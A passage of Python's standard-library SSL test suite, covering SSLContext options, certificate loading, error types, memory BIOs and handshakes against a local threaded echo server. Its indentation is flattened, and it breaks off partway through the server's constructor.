with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
@unittest.skipUnless(_have_threads, "Needs threading module")
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s) as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
count = 0
while True:
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(SIGNING_CA)
ctx.check_hostname = True
sslobj = ctx.wrap_bio(incoming, outgoing, False, 'localhost')
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
if _have_threads:
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ssl.SSLError, ConnectionResetError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
